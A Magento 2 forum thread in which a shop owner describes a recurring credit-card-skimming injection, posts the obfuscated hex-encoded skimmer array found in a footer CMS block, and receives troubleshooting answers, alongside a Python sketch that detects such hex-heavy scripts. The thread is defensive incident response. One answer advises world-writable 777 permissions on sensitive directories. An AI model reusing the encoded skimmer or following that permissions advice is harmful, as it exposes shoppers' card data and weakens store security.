Magento 2 hacked with script in hacked

I can’t seem to locate how this script is getting into the head section of my site but it’s stealing credit cards. I’ve grepped the entire codebase and searched the entire database for “seooptimization” and found nothing so it must be added via createElement somewhere? What’s interesting is it’s added in the middle of all my theme js files. Can anyone help me track this down and figure out how to avoid it getting into the head of my site because I’ve chased it around for months now. I’ve removed it from the cms_block in the database, from miscellaneous scripts in the admin and they just keep finding new ways to put it on the site, now I can’t even track it down to get it off. Here’s what it looks like.

<script src="" id="magento-init"></script>

EDIT: So I finally was able to remove this. I found it in the database in one of my footer blocks in the cms_block table. It was disguised as follows:

<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537","4B030D1849001802451A57514D014C164C0604181E040D59124A5D50", "19034A475057444D120B0405190E5E090D090002101F0B4C1A", "11110A04001B1C5E0C0C0E040E36164D1131192B50591E140B", "0245065705191A05080704154D0F1117420B5C12571317070B15", "15200E0F0C1317044D4519020410001145435A1757030016", "3111161808140C04004A4D12041A5749", "570D161E1105435F4A0F0B06135403000D051102101D0C180B151F161E4B01050C591C06000C1E1251504B", "114B110F15370D04170B0814021C58420B0E465A5E1D04050F0F0216", "5D0C0C031551504B014C0204171D5E04121A04181D33", "180C0E0E4917504B07100F001D044B"];</script>

Maybe someone can comment on how that could possibly end up being a script in the head section of the site?

Also, this doesn’t solve how it got there in the first place. Are there any known methods to inject code into the database for Magento 2.2.6 that may need patched? As far as I know I have all available patches applied.

List of enabled modules:

Aitoc_DimensionalShipping | EkoUK_ImageCleaner | Experius_WysiwygDownloads | FishPig_WordPress | FishPig_WordPress_RelatedProducts | MagePal_GuestToCustomer | MagePsycho_Customshipping | Amasty_Base | Amazon_Core | Amazon_Login | Amazon_Payment | FME_Faqs | Bold_OrderComment | Klarna_Core | Klarna_Ordermanagement | Magefan_LoginAsCustomer | Amasty_CronScheduleList | FME_Prodfaqs | Amasty_GiftCard | Klarna_Kp | Ebizmarts_MailChimp | Dotdigitalgroup_Email | Mageplaza_Core | Mageplaza_Smtp | Magiccart_Alothemes | Magiccart_Magicmenu | Magiccart_Magicproduct | Magiccart_Magicslider | Magiccart_Shopbrand | Magiccart_Testimonial | Mirasvit_Core | Mirasvit_Misspell | Mirasvit_Report | Mirasvit_Search | Mirasvit_SearchAutocomplete | Mirasvit_SearchLanding | Mirasvit_SearchMysql | Mirasvit_SearchReport | Mirasvit_SearchSphinx | Mirasvit_SearchUltimate | ShipWorks_Module | Temando_Shipping | VNS_Custom | Vertex_Tax | WeltPixel_Backend | WeltPixel_Maxmind |

Magento Asked by Casey on October 25, 2020
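Why a search for the plain string finds nothing, as an added example (not part of the original post and not Magento code): the footer block held only hex-encoded literals, so a search has to look for the encoding rather than the decoded text. This Python sketch flags inline scripts in exported CMS rows that consist mostly of long hex strings; the row format, thresholds, function names and sample rows are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# A run of 16 or more hex digits (whole bytes); rare in hand-written CMS markup.
HEX_RUN = re.compile(r"\b(?:[0-9A-Fa-f]{2}){8,}\b")

class InlineScripts(HTMLParser):
    """Collect the body of every inline <script> element."""
    def __init__(self):
        super().__init__()
        self.bodies, self._open = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = True
            self.bodies.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False
    def handle_data(self, data):
        if self._open:
            self.bodies[-1] += data

def hex_heavy_scripts(html, min_literals=3, min_ratio=0.5):
    """Return one finding per inline script that is mostly long hex literals."""
    parser = InlineScripts()
    parser.feed(html)
    parser.close()
    findings = []
    for body in parser.bodies:
        runs = HEX_RUN.findall(body)
        ratio = sum(map(len, runs)) / len(body) if body else 0.0
        if len(runs) >= min_literals and ratio >= min_ratio:
            findings.append({"hex_literals": len(runs), "hex_ratio": round(ratio, 2)})
    return findings

def scan_rows(rows):
    """rows: (table, identifier, content) tuples, e.g. exported from cms_block."""
    hits = {}
    for table, ident, content in rows:
        found = hex_heavy_scripts(content)
        if found:
            hits[(table, ident)] = found
    return hits

# Constructed sample rows (assumed identifiers, not taken from a real store).
SAMPLE_ROWS = [
    ("cms_block", "footer_links", '<ul><li><a href="/contact">Contact</a></li></ul>'
     '<script>var color = "#ffffff"; console.log("footer ready");</script>'),
    ("cms_block", "footer_payment", '<p>We accept all cards</p><script>var meta_tags = ['
     '"0A1B2C3D4E5F60718293A4B5C6D7E8F9","11223344556677889900AABBCCDDEEFF",'
     '"FFEEDDCCBBAA00998877665544332211"];</script>'),
]
```

Calling `scan_rows(SAMPLE_ROWS)` reports only the `footer_payment` row; on a real store, a hit is a block to review by hand, not proof of compromise.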

4 Answers


I have encountered the same issue. It was injecting a fake payment section in the checkout page. This time the link was different though. I was able to remove the code using the header block editor in the admin. But I'm kind of sure it will happen again. Anyway, I'm going to update the whole thing and put a paid firewall service in place. If anybody finds a solution to this, it'd be very helpful. Thanks.

Answered by Mathew on October 25, 2020

Facing the same thing, and I have about 70% of the same modules as you!!! Did you ever find out which module led to the vulnerability?

Answered by Jojo on October 25, 2020

  1. Check your site in a clean browser (not the one you usually use) in case a browser extension adds the script to the page.
  2. Modify the root index.php to "echo 123" to check whether the injected script relates to Magento.
  3. Check on the Luma or Base theme to know whether your custom theme is to blame.
  4. If the theme is not the cause, disable all 3rd-party modules and check:

php bin/magento module:status | grep -v Magento | grep -v List | grep -v None | grep -v -e '^$'| xargs php bin/magento module:disable

  5. Go over all .htaccess files in the project and look for suspicious file injection.
  6. If the theme and 3rd-party modules are not the cause, the issue is probably hidden somewhere in the Magento core files.

Answered by Denys Belevtsov on October 25, 2020

  1. First of all scan your website with the available tools like

    • SiteCheck
    • MageReport
    • UnmaskParasites
    • Foregenix
    • Github Magento Malware Scanner
    • MageScan
    • VirusTotal

then you will get some idea on malware and security issues for your website.

  2. Please ask your hosting provider for a detailed report on website security.

  3. You can check Magento file and folder permissions as well from your end and make them proper by running the following commands:

find . -type f -exec chmod 644 {} \;             # 644 permission for files
find . -type d -exec chmod 755 {} \;             # 755 permission for directories
find ./var -type d -exec chmod 777 {} \;         # 777 permission for var folder
find ./pub/media -type d -exec chmod 777 {} \;
find ./pub/static -type d -exec chmod 777 {} \;
chmod 777 ./app/etc
chmod 644 ./app/etc/*.xml

Hope this will help you and please share an update after this activity so I can guide you next step.

Answered by Jack on October 25, 2020
